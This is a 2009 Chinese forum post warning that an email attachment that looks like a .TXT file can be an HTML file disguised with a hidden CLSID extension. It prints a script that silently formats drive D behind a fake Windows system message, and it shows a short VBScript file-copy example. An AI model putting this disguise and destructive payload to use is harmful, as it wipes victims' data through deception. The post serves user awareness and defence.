找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 345|回复: 0

浅谈TXT文件的安全性!

[复制链接]

18

主题

9

回帖

38

牛毛

初生牛犊

积分
38
QQ
发表于 2009-4-30 08:59:07 | 显示全部楼层 |阅读模式 来自 山西省忻州市
大家都知道,现在大多数病毒的传播媒介都是可执行文件或脚本文件,但当你收到一分附件为.TXT为后缀名的邮件时,你会不会有所警觉呢?在一定程度上也可以造成破坏!由于目前大多数人使用的是Windows系列的操作系统,而Windows设置是隐藏已知文件扩展名。当你点击那个看上去很友善的文件时,那些破坏性的东西就会一一跳了出来。

   假如你收到一分邮件,附件里的文件名为“美媚大放送.TXT”,你是不是会认定他肯定是纯文本文件呢?那可不一定哦!它的实际文件名可以是“美媚大放送.TXT.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”。其中的“{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”在注册表里的含义是HTML文件关联。但是存成文件时它就不会显现出来,你看到的这个.TXT文件其实就是“美媚大放送.TXT.HTML”。那么打开这个文件又会有什么危害呢?如果这个文件的内容如下(警告:以下代码可能带有攻击性,禁止乱用,一切使用后过自负!):

〈script〉
a=new ActiveXObject("WSCript.Shell");
a.run("format.com D:/q /autotest /u");
alert("Windows is configuring the system. Please do not interrupt this process.");
〈/script〉

   那么它就会调用IE运行FORMAT命令,同时显示“Windows is configuring the system. Please
do not interrupt this process.”,呵呵,这下你可就惨了。要注意哦~
大家大概已经注意到第二行的“WSCript”了吧,对啊,就是它在导演着这场戏。

   WSCript全称“Windows Scripting Host”,它是Windows 98新增的功能,是一种批次语言/自动执行工具——它所对应的程序“WSCript.exe”是一个脚本语言解释器,为于WINDOWS目录下,正是它才使得脚本可以被执行,就象执行批处理一样。在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带的几个对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。

   下面我们通过一个小的例子来说明WSCript的功能是如何的强大,而使用又是何等的简单,被人利用的威胁有是如何之大。例如有一个.vbs文件:

Set so=CreatObject(Scripting.FileSystemObject")
so.GetFile(c:\Windows\winipcfg.exe).Copy("e:\winipcfg.exe")

   这么短短的两行就可以COPY一个文件到指定位置。第一行:创建一个文件系统对象;第二行:打开脚本文件,c:\Windows\winipcfg.exe指明这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到E盘根目录下。这也是现今大多数利用VBscript编写的病毒的一个特点。由此可以看出禁止FileSystemObject对象就可以有效地控制这种病毒的传播。禁止FileSystemObject对象可用如下命令:

regsvr32 scrrun.dll /u

   好了,只写这些了,最后还要说一句,OUTLOOK问题多多,少用为好,建议收发信使用FoxMail,同时也支持一下国产软件!
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-29 06:54 , Processed in 0.147534 second(s), 34 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表